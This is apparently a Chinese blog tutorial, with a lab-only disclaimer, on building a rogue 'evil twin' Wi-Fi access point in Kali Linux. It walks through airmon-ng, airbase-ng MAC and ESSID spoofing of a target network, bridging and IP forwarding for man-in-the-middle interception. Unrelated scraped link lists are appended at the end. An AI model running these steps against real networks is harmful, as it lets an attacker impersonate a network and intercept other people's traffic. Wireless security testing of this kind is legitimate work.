本技术博客只用于实验环境的测试学习,不可用于其他用途,否则造成的后果自行承担!

1.查看网卡并启动相应网卡的监听模式

ifconfig -a
airmon-ng start wlan1
启动监听模式之后网卡名称会变为wlan1mon(根据具体网卡名而有所不同,如:wlan0mon)
查看网卡的工作模式可以用:
iwconfig wlan1mon 查看Mode字样,如果为Monitor则确定当前网卡已进入监听模式

2.指定网卡在信道7进行扫描,寻找目标wifi

ariodump wlan1mon -c 7

3.启动无赖AP,模拟目标路由器(AP)的MAC地址和ESSID(wifi名称)

airbase-ng -a 要模拟的目标MAC --essid "目标wifi名称" wlan1mon

4.创建网桥接口

brctl addbr mitm
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up

5.开启Linux(kali)内核流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

6.为创建的网桥指定ip并启动桥接网卡

ifconfig mitm 192.168.31.22 up

7.验证网络连通性

ping 网关192.168.31.1验证网络连通性

8.探索总结

本次实验我采用外置usb网卡作为功能AP,虽然能ping通网关,且wifi也能连接,但是不能正常上网,根据我多方面研究与测试初步判定为usb网卡本身的问题,
后来用笔记本自带的网卡通过同样的是操作搭建成功,只是AP的网速很慢,只有原始网速的1/20。

原文出自:http://pyspiderking.cn/index.php/2021/07/29/wireless-wifi-ap/

kali wifi 无线渗透测试 网卡桥接搭建无赖AP相关推荐

  1. Kali Linux 无线渗透测试入门指南 第一章 配置无线环境

    第一章 配置无线环境 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 如果我要在八个小时之内砍倒一棵树,我会花六 ...

  2. kail linux配置无线网络,Kali Linux 无线渗透测试入门指南 第一章 配置无线环境

    第一章 配置无线环境 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 简介 如果我要在八个小时之内砍倒一棵树,我会花六个小时来磨我的斧子. -- 亚伯拉罕· ...

  3. kail linux无线渗透测试只能,Kali Linux 无线渗透测试入门指南 第一章 配置无线环境...

    第一章 配置无线环境 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 简介 如果我要在八个小时之内砍倒一棵树,我会花六个小时来磨我的斧子. -- 亚伯拉罕· ...

  4. Kali Linux 无线渗透测试入门指南 第七章 高级 WLAN 攻击

    第七章 高级 WLAN 攻击 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 知己知彼,百战不殆. 孙子,< ...

  5. Kali Linux 无线渗透测试入门指南 第四章 WLAN 加密缺陷

    第四章 WLAN 加密缺陷 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 任何人对于内存的需求,都不会超过64 ...

  6. Kali Linux 无线渗透测试入门指南 第九章 无线渗透测试方法论

    第十章 WPS 和 探针 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 太阳底下无新事. – 谚语 这一章由新的技巧 ...

  7. Kali Linux 无线渗透测试入门指南 第十章 WPS 和 探针

    第十章 WPS 和 探针 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 太阳底下无新事. – 谚语 这一章由新的技巧 ...

  8. Kali Linux 无线渗透测试入门指南 第六章 攻击客户端

    第六章 攻击客户端 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 安全强度取决于最弱的部分. – 信息安全领域 ...

  9. Kali Linux 无线渗透测试入门指南 第八章 攻击企业级 WPA 和 RADIUS

    第八章 攻击企业级 WPA 和 RADIUS 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 个头越大,摔得越惨 ...

  10. Kali Linux 无线渗透测试入门指南 第三章 绕过 WLAN 身份验证

    第三章 绕过 WLAN 身份验证 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 安全的错觉比不安全更加糟糕. ...

最新文章

  1. 如何不显示index.php,如何隐藏index.php入口文件?
  2. picsart旧版本_PicsArt历史版下载
  3. BPSK、QPSK、MPSK、QAM、16QAM的调制解调Matlab实现
  4. 使用java的HttpClient实现抓取网页数据
  5. SQL Server 数据库安全
  6. 2020-09-17
  7. AI顶会直播丨深度学习顶级会议ICLR 2021中国预讲会明天召开,为期三天五大论坛...
  8. 对 /sbin/nologin 的理解
  9. SQL一键备份用户数据库
  10. 财务报表五力、五性分析雷达图
  11. Mac电脑用CrossOver安装的Windows软件位置
  12. 关于erlang的-run 的启动参数
  13. 关于Android中设置闹钟的相对完善的解决方案
  14. 例2.7 输出梯形 - 九度教程第14题(排版题)
  15. 基于单片机的红外检测及语音响应系统
  16. 各种说明方法的答题格式_说明方法作用答题格式
  17. 【计算机视觉】简述对MSAA(多尺度注意力融合)的理解
  18. Java程序占用 CPU 过高怎么排查
  19. git基础之切换分支
  20. Involution:空间不共享?可完全替代卷积的高性能算子 | CVPR 2021

热门文章

  1. 软考-信息安全工程师-下午题常考
  2. Jenkins Xcode打包ipa
  3. cpu,cache,Ram,harddisk存储速度
  4. 命令行获取本地安全策略
  5. matlab 光谱共聚焦,光谱共焦技术介绍.PDF
  6. CS和BS 到底是什么
  7. matlab环境下图像分形维数的计算,MATLAB环境下图像分形维数的计算
  8. 计算机二级1px等于多少厘米,px和pt换算(1px等于多少pt)
  9. Java——NIO和IO的区别
  10. STM8单片机的中断优先级